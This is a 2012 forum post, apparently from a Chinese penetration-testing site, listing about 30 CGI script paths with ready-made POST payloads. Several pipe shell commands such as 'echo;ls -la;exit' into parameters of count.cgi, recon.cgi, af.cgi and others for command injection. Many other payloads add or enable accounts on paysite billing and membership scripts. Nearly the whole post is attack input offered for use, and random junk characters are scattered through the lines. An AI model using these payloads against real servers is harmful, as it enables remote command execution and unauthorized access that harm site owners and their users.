中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================7 L& N/ v7 N1 u  g0 t

5 @( t+ J* h! N/smspass.pl
' M0 F; d( k+ x- B- _9 `1 Ausername=username&password=password
! A8 A$ w! ]; ]) i) r% q3 S5 t% [2 A# t/ W  V
/index.cgi
" r/ H0 {6 q0 k# P/ |6 g# |( Hwei=ren&gen=command
" L& V% p$ \- k  k; E  r( U/ C! I
4 G" R) ?3 u. o) Z, ]8 e& j9 _/passmaster.cgi! ?; E3 o( o; W: z+ q: [
Action=Add&Username=Username&Password=Password
) @( w( Z4 Z$ q+ p  V5 U. o4 c
& ~  t& p: `2 c( X! l2 i. L) N/accountcreate.cgi# ~' ^! v; Y. H5 n8 o
username=username&password=password&ref1=|echo;ls|
  G: Y0 I3 J$ I
3 N+ u' O2 U' i9 `1 c/form.cgi
! M; H& S7 m' y! J% A9 m6 lname=xxxx&email=email&subject=xxxx&response=|echo;ls|9 T$ c; o8 r2 [6 x4 a9 D" n0 a! W8 u

# M' Q+ h3 p* P# q( C/addusr.pl8 i/ H0 R: g- [6 `- z: s
/cgi-bin/EuroDebit/addusr.pl
5 w. _9 ?  ]& @6 Quser=username&pass=Password&confirm=Password
- ^3 [/ J4 H' m8 K% q. |3 e# F! d* w5 {6 F' D0 a
/ccbill-local.asp
, J" L3 ^$ r! r' q! l. Tpost_values=username:password* ?4 |$ ]( B( ^% K' ~. ~

# u* @: d1 L9 ^% n* S/count.cgi
6 B, M$ L$ F# b" q. G4 [+ b! m5 ^pinfile=|echo;ls -la;exit|7 |' U: v3 S' w

1 `% D0 s  h8 {$ c6 g/recon.cgi
8 @8 g! _) c6 |; a( t9 X/recon.cgi?search2 L+ T( q' a) p3 H7 V: f# _9 P
searchoption=1&searchfor=|echo;ls -al;exit|
& h2 W- l; V+ ~% I  F7 d* r: k4 m
6 N) W1 B% h0 B. [/verotelrum.pl/ C7 W! }) R3 \
vercode=username:password:dseegsow:add:amount<&30>- S( K" b) m  W& N# _: f

* J% s3 {+ `  ]) B+ O; j+ s$ x/af.cgi
3 e3 z# \" H; |_browser_out=|echo;ls -la;exit;|
% o9 c, V# a( @6 @1 d: {2 d8 j+ `" y' w- I; v
/modify.cgi
- e3 e8 {9 J+ k3 T1 lusername=username&password=password&expire=30
  o: E7 J# v3 o" e, j0 }6 g+ s2 Q+ n9 J1 @/ l$ S
/openjournal.cgi
. e' A! C5 H3 t9 {( v4 l9 O" Pedit=1&ct=2&go=|echo;ls -al;exit|: g) m  ?$ }8 j0 S7 g' @# t5 @1 t

  w6 b$ C7 z* q7 M! s/gx9passwd.cgi
: m: L. x: b/ x4 ]% Ucmd=ADD&user=username&pass=password
1 G7 {" N3 a+ c' v( ^+ Q; _4 k
6 j( W2 {4 t3 w, c6 u" k' [/probecontrol.cgi
# d( f& O1 |) h2 D7 N$ W( |command=enable&username=username&password=password% U! D4 {- j3 p! _" c

+ C8 H; y: S; ?+ B+ Q$ ]- b/recon.cgi. o/ F6 _% Q6 \+ P2 S1 ]# B5 L
searchoption=3&searchfor=echo;ls -la;exit7 f1 F( R1 c7 X( M8 i
0 e% d# O5 i- ?2 m
/htadd.pl
( \, I" \8 [3 k6 _  m4 _( ^9 Cconfigfile=|echo; ls -alt; exit
! f1 I# `( V3 o+ e" }. F
2 H! r& N# H- ^$ g+ D4 D6 X, W/gx9passwd.cgi+ Q9 E+ O$ s8 q- p
cmd=ADD&user=username&pass=password( a; H/ X2 @# x0 c- n
) v% Y; y0 I( C4 f! K& l
/ibill*.pl0 u4 W  h/ d$ p/ M0 o  I  ~
reqtype=add&authpwd=authpwd&username=username&password=password: k/ k0 p, p+ F, P. d
( X/ R+ T$ |0 |0 ~9 a: R, u0 e
/cpay.cgi3 d1 c$ I. r& i2 b6 K: P* ~+ z7 R
command=add_member&username=username(EMAIL)&password=password(DES)
. A* r* ]2 L+ h/ _, n, e4 e6 U& Q% @% a* @4 T; a- g7 O" \
/globill_ut.cgi
2 t$ c" M' M7 c' ?1 s! Bdo=add&username=username&password=password&wpassword=password
( c* {1 O! E: _4 l4 Z9 P8 J/ b' _) T1 w. h# w# X4 n3 T$ N
/usercontrol.cgi
' h9 M+ U3 N4 F' V2 Fcommand=enable&username=USER&password=PASS
2 L! P/ l/ I& P; {  ^& K! L9 X& W( W
/globoSALErum.cgi7 Y, R4 k/ b2 e
action=ADD&seccode=seccode&login=username&password=password* G' I' N# g! z  h

& ?5 y9 y4 N  G) g( J/addusr.pl
' F( O) H1 p' w& nuser=USER&pass=PASS&confirm=PASS
. r8 r; ]! N3 \5 F* Q9 t4 C  M' @) O; _" I3 R5 ?' H. G9 ?7 N
/pincount.cgi
6 R8 n, u  M) K' J/cgi-bin/mastergate/pincount.cgi
( l/ G$ H5 v: Y9 @' {8 G' w0 S& F) Ppinfile=|echo;pwd;exit|+ F7 c5 r: ~, k* a, r5 q; D3 J% h6 e
  Y4 ~+ Q+ t2 |2 \6 \( G5 e
/accountcreate.cgi
2 a) |, A2 @+ v/cgi-bin/gateway/accountcreate.cgi
( V$ N1 [' n# c* I3 u+ p. m* Qusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
( M: I3 o. _! B  d9 g5 F# s  s* h0 y. \  _
/af.cgi  @) d) C" p! k
/env.cgi
6 s4 Q9 b; p+ sADD+;echo;pwd;exit
7 J5 u+ A( x& e7 \0 P5 g5 q$ {3 d# K& b6 @* l/ k- _
/count.cgi
& q% z; A( w4 T, opinfile=|echo;pwd;exit|
4 {; c  [! M: x' e4 X. |* a6 Z
) G8 o2 e9 P2 l* O; f& Y# F4 z/recon.cgi8 g! @8 F# u; l; R, T% i8 K
searchoption=1&searchfor=|echo;ls%20-al;exit|
' O* w9 _- S. k7 B1 R, o- A/ e- e& }- r, p2 h
/add.cgi
/ a1 @# z& [5 m1 K" K1 Rusername=username&password=password&expire=30; C/ g5 ?5 c; _8 v# {7 z: D

2 B; S" m# W& i- N==============================: e$ K* M* j8 U9 V! r& x





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2